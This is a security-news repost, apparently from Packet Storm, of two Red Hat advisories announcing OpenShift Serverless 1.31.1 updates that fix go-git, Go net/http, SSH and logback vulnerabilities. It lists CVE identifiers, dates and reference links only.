    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0880.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Release of OpenShift Serverless Client kn 1.31.1 security updateAdvisory ID:        RHSA-2024:0880-03Product:            Red Hat OpenShift ServerlessAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0880Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-39326====================================================================Summary: Red Hat OpenShift Serverless 1.31.1 is now available.Red Hat Product Security has rated this update as having a security impact ofCritical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift Serverless Client kn 1.31.1 provides a CLI to interact withRed Hat OpenShift Serverless 1.31.1. The kn CLI is delivered as an RPM packagefor installation on RHEL platforms, and as binaries for non-Linux platforms.This release includes security, bug fixes, and enhancements.Security Fix(es):* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)* go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients (CVE-2023-49569)* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)A Red Hat Security Bulletin, which addresses further details about the RapidReset flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.31CVEs:CVE-2023-39326References:https://access.redhat.com/security/updates/classification/#criticalhttps://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.31https://bugzilla.redhat.com/show_bug.cgi?id=2253330https://bugzilla.redhat.com/show_bug.cgi?id=2254210https://bugzilla.redhat.com/show_bug.cgi?id=2258143https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-0880-03

Red Hat Security Advisory 2024-0843-03 - Red Hat OpenShift Serverless version 1.31.1 is now available. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0843.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Release of OpenShift Serverless 1.31.1Advisory ID:        RHSA-2024:0843-03Product:            Red Hat OpenShift ServerlessAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0843Issue date:         2024-02-15Revision:           03CVE Names:          CVE-2023-6481====================================================================Summary: Red Hat OpenShift Serverless version 1.31.1 is now available.Red Hat Product Security has rated this update as having a security impact ofCritical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Version 1.31.1 of the OpenShift Serverless Operator is supported on Red HatOpenShift Container Platform versions 4.11, 4.12, 4.13 and 4.14This release includes security, bug fixes, and enhancements.Security Fix(es):* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)* go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients (CVE-2023-49569)* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)* logback: A serialization vulnerability in logback receiver (CVE-2023-6481)For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.31CVEs:CVE-2023-6481References:https://access.redhat.com/security/updates/classification/#criticalhttps://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.31https://bugzilla.redhat.com/show_bug.cgi?id=2252956https://bugzilla.redhat.com/show_bug.cgi?id=2253330https://bugzilla.redhat.com/show_bug.cgi?id=2254210https://bugzilla.redhat.com/show_bug.cgi?id=2258143https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Tag

#ssh